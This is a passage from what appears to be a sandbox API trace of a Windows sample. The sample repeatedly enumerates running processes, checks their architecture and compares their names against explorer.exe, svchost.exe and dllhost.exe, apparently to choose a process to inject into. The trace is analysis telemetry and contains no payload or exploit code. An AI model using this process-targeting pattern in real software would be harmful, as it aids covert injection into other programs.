lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0258.806] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0258.806] CloseHandle (hObject=0xd8) returned 1 [0258.806] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.807] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0258.807] CloseHandle (hObject=0xd4) returned 1 [0258.807] Sleep (dwMilliseconds=0x3e8) [0259.811] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0259.813] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0259.813] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0259.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0259.814] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0259.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0259.814] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0259.815] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0259.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0259.815] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0259.816] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0259.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0259.816] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0259.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0259.817] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0259.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0259.817] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0259.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0259.818] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0259.818] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0259.819] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0259.819] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0259.820] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0259.820] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0259.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0259.821] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0259.821] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0259.822] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0259.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0259.822] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.822] CloseHandle (hObject=0xd8) returned 1 [0259.823] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0259.823] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0259.823] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0259.823] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0259.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0259.823] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0259.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0259.824] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.824] CloseHandle (hObject=0xd8) returned 1 [0259.824] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0259.824] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0259.824] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0259.824] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0259.824] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0259.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0259.825] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0259.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0259.825] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.825] CloseHandle (hObject=0xd8) returned 1 [0259.825] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0259.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0259.826] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.826] CloseHandle (hObject=0xd8) returned 1 [0259.826] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0259.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0259.826] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.827] CloseHandle (hObject=0xd8) returned 1 [0259.827] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0259.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0259.827] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.827] CloseHandle (hObject=0xd8) returned 1 [0259.827] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0259.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0259.828] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.828] CloseHandle (hObject=0xd8) returned 1 [0259.828] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0259.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0259.828] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.828] CloseHandle (hObject=0xd8) returned 1 [0259.828] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0259.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0259.829] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.829] CloseHandle (hObject=0xd8) returned 1 [0259.829] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0259.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0259.829] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.829] CloseHandle (hObject=0xd8) returned 1 [0259.830] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0259.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0259.830] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.830] CloseHandle (hObject=0xd8) returned 1 [0259.830] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0259.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0259.831] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.831] CloseHandle (hObject=0xd8) returned 1 [0259.831] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0259.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0259.831] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.831] CloseHandle (hObject=0xd8) returned 1 [0259.831] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0259.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0259.832] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.832] CloseHandle (hObject=0xd8) returned 1 [0259.832] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0259.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0259.832] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.832] CloseHandle (hObject=0xd8) returned 1 [0259.832] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0259.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0259.833] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.833] CloseHandle (hObject=0xd8) returned 1 [0259.833] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0259.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0259.834] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.834] CloseHandle (hObject=0xd8) returned 1 [0259.834] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0259.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0259.834] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.834] CloseHandle (hObject=0xd8) returned 1 [0259.834] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0259.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0259.835] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.835] CloseHandle (hObject=0xd8) returned 1 [0259.835] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0259.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0259.835] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.835] CloseHandle (hObject=0xd8) returned 1 [0259.835] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0259.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0259.836] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.836] CloseHandle (hObject=0xd8) returned 1 [0259.836] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0259.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0259.837] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.837] CloseHandle (hObject=0xd8) returned 1 [0259.837] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0259.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0259.837] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.837] CloseHandle (hObject=0xd8) returned 1 [0259.837] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0259.838] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0259.838] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0259.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0259.839] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0259.839] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0259.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0259.840] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0259.840] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.840] CloseHandle (hObject=0xd8) returned 1 [0259.840] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0259.840] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, 